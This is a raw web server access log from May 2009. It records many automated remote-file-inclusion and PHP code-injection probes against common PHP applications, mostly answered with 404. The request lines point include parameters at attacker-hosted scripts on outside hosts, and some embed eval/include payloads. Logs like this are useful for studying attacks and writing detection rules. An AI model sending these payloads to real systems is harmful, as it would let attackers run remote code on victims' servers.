89.223.3.98 - - [16/May/2009:03:32:01 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:03:32:10 -0400] "GET /logs/access_log.Q108100900//include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:03:32:12 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:03:32:12 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:03:32:12 -0400] "GET /logs/access_log.Q109032900//include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:03:32:13 -0400] "GET /logs/access_log.Q108100900//include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:03:32:14 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:03:32:14 -0400] "GET /logs/access_log.Q109032900//include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:03:32:15 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:03:32:16 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:03:32:16 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:03:32:16 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:03:32:16 -0400] "GET /logs/access_log.Q109032900//include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:03:32:16 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:03:32:16 -0400] "GET /logs/access_log.Q108100900//include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:03:32:16 -0400] "GET /logs/access_log.Q108100900//include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:03:32:18 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:03:32:18 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:03:32:19 -0400] "GET /logs/access_log.Q108100900%20%20//include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:03:32:19 -0400] "GET /logs/access_log.Q109032900%20%20//include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:03:32:19 -0400] "GET /logs/access_log.Q108100900//include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:03:32:21 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:03:32:21 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:03:32:21 -0400] "GET /logs/access_log.Q109032900%20%20//include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:03:32:21 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:03:32:22 -0400] "GET /logs/access_log.Q109032900%20%20//include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:03:32:22 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:03:32:23 -0400] "GET /logs/access_log.Q108100900%20%20//include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:03:32:23 -0400] "GET /logs/access_log.Q108100900%20%20//include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:03:32:24 -0400] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:03:32:24 -0400] "GET /akocomments.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:03:32:24 -0400] "GET /logs/access_log.Q108061500/akocomments.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:03:32:33 -0400] "GET /logs/error_log.Q109012400%20%20/akocomments.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
62.44.79.35 - - [16/May/2009:03:32:45 -0400] "GET //?path%5Bdocroot%5D=http://www.rgbclub.net/bbs/icon/fx29id.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
62.44.79.35 - - [16/May/2009:03:32:45 -0400] "GET /logs/access_log.Q108121100%20%20//?path%5Bdocroot%5D=http://www.rgbclub.net/bbs/icon/fx29id.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
62.44.79.35 - - [16/May/2009:03:32:45 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.rgbclub.net/bbs/icon/fx29id.txt??? HTTP/1.1" 200 1557 "-" "Mozilla/5.0"
69.94.30.156 - - [16/May/2009:03:32:47 -0400] "GET //BaseAdmin.class.php?_CONF[path]=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
69.94.30.156 - - [16/May/2009:03:32:48 -0400] "GET /logs//BaseAdmin.class.php?_CONF[path]=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
69.94.30.156 - - [16/May/2009:03:32:48 -0400] "GET /logs/access_log.Q109022600//BaseAdmin.class.php?_CONF[path]=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
62.44.79.35 - - [16/May/2009:03:32:56 -0400] "GET /logs/access_log.Q108111700%20%20//?path%5Bdocroot%5D=http://www.rgbclub.net/bbs/icon/fx29id.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
85.214.86.93 - - [16/May/2009:03:33:03 -0400] "GET /logs/access_log.Q109022600//BaseAdmin.class.php?_CONF[path]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
85.214.86.93 - - [16/May/2009:03:33:03 -0400] "GET //BaseAdmin.class.php?_CONF[path]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
85.214.86.93 - - [16/May/2009:03:33:03 -0400] "GET /logs//BaseAdmin.class.php?_CONF[path]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
81.201.105.162 - - [16/May/2009:03:33:21 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://treffuns.de//img/icons/tabs/id2.txt??%0D?? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
81.201.105.162 - - [16/May/2009:03:33:21 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://treffuns.de//img/icons/tabs/id2.txt??%0D?? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
81.201.105.162 - - [16/May/2009:03:33:22 -0400] "GET /logs/access_log.Q108100900//include/print_category.php?setup[use_category]=1&dir=http://treffuns.de//img/icons/tabs/id2.txt??%0D?? HTTP/1.1" 404 252 "-" "libwww-perl/5.79"
190.144.44.36 - - [16/May/2009:03:33:41 -0400] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 223 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
190.144.44.36 - - [16/May/2009:03:33:41 -0400] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
81.201.105.162 - - [16/May/2009:03:33:45 -0400] "GET /logs/access_log.Q109032900//include/print_category.php?setup[use_category]=1&dir=http://treffuns.de//img/icons/tabs/id2.txt??%0D?? HTTP/1.1" 404 252 "-" "libwww-perl/5.79"
58.227.193.198 - - [16/May/2009:03:34:04 -0400] "GET /logs/access_log.Q108122100/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:03:34:12 -0400] "GET /logs/access_log.Q108102500/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
69.94.30.156 - - [16/May/2009:03:34:21 -0400] "GET /logs/access_log.Q109022600%20%20//BaseAdmin.class.php?_CONF[path]=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
69.172.92.14 - - [16/May/2009:03:34:24 -0400] "GET /logs/access_log.Q108060200//class/class.dashboard_cms.php?where_framework=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:03:34:24 -0400] "GET //class/class.dashboard_cms.php?where_framework=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:03:34:24 -0400] "GET /logs//class/class.dashboard_cms.php?where_framework=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
124.0.54.98 - - [16/May/2009:03:34:25 -0400] "GET //?path%5Bdocroot%5D=http://www.rgbclub.net/bbs/icon/fx29id.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
124.0.54.98 - - [16/May/2009:03:34:28 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.rgbclub.net/bbs/icon/fx29id.txt??? HTTP/1.1" 200 1557 "-" "Mozilla/5.0"
124.0.54.98 - - [16/May/2009:03:34:28 -0400] "GET /logs/access_log.Q108111700%20%20//?path%5Bdocroot%5D=http://www.rgbclub.net/bbs/icon/fx29id.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.172.92.14 - - [16/May/2009:03:34:31 -0400] "GET /logs/access_log.Q109022600//class/class.dashboard_cms.php?where_framework=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.803"
87.106.135.14 - - [16/May/2009:03:34:35 -0400] "GET /logs/access_log.Q108060200//class/class.dashboard_cms.php?where_framework=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:03:34:35 -0400] "GET //class/class.dashboard_cms.php?where_framework=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:03:34:36 -0400] "GET /logs//class/class.dashboard_cms.php?where_framework=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:03:34:44 -0400] "GET /logs/access_log.Q109022600//class/class.dashboard_cms.php?where_framework=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
89.223.3.98 - - [16/May/2009:03:34:50 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:03:34:50 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:03:34:54 -0400] "GET /logs/access_log.Q108100900//include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
88.84.128.40 - - [16/May/2009:03:34:54 -0400] "GET /logs/access_log.Q108060200//class/class.dashboard_cms.php?where_framework=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:03:34:54 -0400] "GET //class/class.dashboard_cms.php?where_framework=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:03:34:54 -0400] "GET /logs//class/class.dashboard_cms.php?where_framework=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
121.173.130.41 - - [16/May/2009:03:34:58 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
121.173.130.41 - - [16/May/2009:03:34:58 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
121.173.130.41 - - [16/May/2009:03:34:58 -0400] "GET /logs/access_log.Q108122400%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.94.30.156 - - [16/May/2009:03:35:03 -0400] "GET /logs/access_log.Q108122100%20%20//BaseAdmin.class.php?_CONF[path]=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
72.52.255.82 - - [16/May/2009:03:35:11 -0400] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.255.82 - - [16/May/2009:03:35:11 -0400] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 223 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
88.84.128.40 - - [16/May/2009:03:35:11 -0400] "GET /logs/access_log.Q109022600//class/class.dashboard_cms.php?where_framework=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.803"
203.94.155.59 - - [16/May/2009:03:35:24 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
203.94.155.59 - - [16/May/2009:03:35:24 -0400] "GET /logs/access_log.Q108122400%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.94.155.59 - - [16/May/2009:03:35:24 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:03:35:37 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:03:35:37 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:03:35:37 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:03:35:37 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
121.173.130.41 - - [16/May/2009:03:35:38 -0400] "GET /logs/access_log.Q108082900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:03:35:38 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:03:35:38 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:03:35:41 -0400] "GET /logs/access_log.Q108100900//include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:03:35:42 -0400] "GET /logs/access_log.Q108100900//include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:03:35:42 -0400] "GET /logs/access_log.Q108100900//include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
218.175.152.13 - - [16/May/2009:03:35:45 -0400] "GET /logs/access_log.Q109042200 HTTP/1.1" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.0.54.98 - - [16/May/2009:03:35:48 -0400] "GET /logs/access_log.Q108082000%20%20//?path%5Bdocroot%5D=http://www.rgbclub.net/bbs/icon/fx29id.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:03:35:52 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:03:35:52 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:03:35:52 -0400] "GET /logs/access_log.Q108052000/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:03:35:56 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:03:35:56 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:03:35:56 -0400] "GET /logs/access_log.Q108052000/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
85.214.86.93 - - [16/May/2009:03:36:01 -0400] "GET /logs/access_log.Q109022600%20%20//BaseAdmin.class.php?_CONF[path]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:03:36:03 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:03:36:03 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:03:36:03 -0400] "GET /logs/access_log.Q108052000%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
218.175.151.247 - - [16/May/2009:03:36:10 -0400] "GET /logs/access_log.Q109040200 HTTP/1.1" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
203.94.155.59 - - [16/May/2009:03:36:15 -0400] "GET /logs/access_log.Q108082900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:03:36:24 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:03:36:24 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:03:36:24 -0400] "GET /logs/access_log.Q108052000/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:03:36:30 -0400] "GET /logs/access_log.Q109050300/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
190.144.44.36 - - [16/May/2009:03:36:31 -0400] "GET /logs/access_log.Q109011400//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:03:36:39 -0400] "GET /logs/access_log.Q109050300%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:03:36:48 -0400] "GET /logs/access_log.Q109050300/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
209.59.12.99 - - [16/May/2009:03:36:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
190.144.44.36 - - [16/May/2009:03:36:56 -0400] "GET /logs/access_log.Q108112400//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
85.214.86.93 - - [16/May/2009:03:37:01 -0400] "GET /logs/access_log.Q108122100%20%20//BaseAdmin.class.php?_CONF[path]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
217.18.76.16 - - [16/May/2009:03:38:28 -0400] "GET /logs/access_log.Q108121300//classes/adodbt/sql.php?classes_dir=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
217.18.76.16 - - [16/May/2009:03:38:29 -0400] "GET //classes/adodbt/sql.php?classes_dir=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
217.18.76.16 - - [16/May/2009:03:38:29 -0400] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
124.0.54.98 - - [16/May/2009:03:38:49 -0400] "GET //?path%5Bdocroot%5D=http://www.rgbclub.net/bbs/icon/fx29id.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
124.0.54.98 - - [16/May/2009:03:38:49 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.rgbclub.net/bbs/icon/fx29id.txt??? HTTP/1.1" 200 1557 "-" "Mozilla/5.0"
